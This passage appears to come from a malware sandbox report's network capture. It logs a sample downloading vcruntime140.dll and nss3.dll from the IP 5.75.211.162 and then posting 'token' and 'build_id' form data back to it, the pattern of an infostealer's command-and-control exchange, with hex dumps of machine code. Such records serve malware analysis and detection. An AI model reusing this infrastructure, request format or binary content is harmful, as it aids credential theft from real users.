7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 Data Ascii: twu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-25 18:49:43 UTC	16384	IN	Data Raw: 8b 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-25 18:49:43 UTC	16384	IN	Data Raw: 00 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-25 18:49:43 UTC	16384	IN	Data Raw: eb e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:43 UTC	201	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:44 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:44 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Wednesday, 25-Sep-2024 18:49:44 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 18:49:44 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-25 18:49:44 UTC	16384	IN	Data Raw: 02 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-09-25 18:49:44 UTC	16384	IN	Data Raw: 00 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-25 18:49:44 UTC	16384	IN	Data Raw: 8b d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-25 18:49:44 UTC	15606	IN	Data Raw: 4e 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 Data Ascii: NT@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicr

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:45 UTC	193	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:45 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:45 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Wednesday, 25-Sep-2024 18:49:45 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 18:49:45 UTC	16120	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-25 18:49:45 UTC	16384	IN	Data Raw: ee 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-25 18:49:45 UTC	16384	IN	Data Raw: 68 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b Data Ascii: hRQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$
2024-09-25 18:49:45 UTC	16384	IN	Data Raw: 77 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e Data Ascii: w@@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-25 18:49:45 UTC	16384	IN	Data Raw: ff ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-09-25 18:49:45 UTC	16384	IN	Data Raw: 24 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 Data Ascii: $%D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-25 18:49:45 UTC	16384	IN	Data Raw: 46 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 Data Ascii: Fd8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-09-25 18:49:45 UTC	16384	IN	Data Raw: e9 e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-M
2024-09-25 18:49:45 UTC	16384	IN	Data Raw: 89 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-25 18:49:45 UTC	16384	IN	Data Raw: 00 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:48 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:48 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 34 34 32 66 31 34 63 33 62 63 65 63 34 31 63 64 33 36 64 37 65 34 64 66 34 38 63 35 64 31 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 62 66 35 65 34 33 31 38 36 39 36 34 33 61 32 61 63 33 39 37 64 32 64 63 30 64 36 38 37 66 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"d442f14c3bcec41cd36d7e4df48c5d17------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="build_id"9bf5e431869643a2ac397d2dc0d687fb------CBFBGCGIJKJJKFIDBFCGCont
2024-09-25 18:49:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 18:49:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:51 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
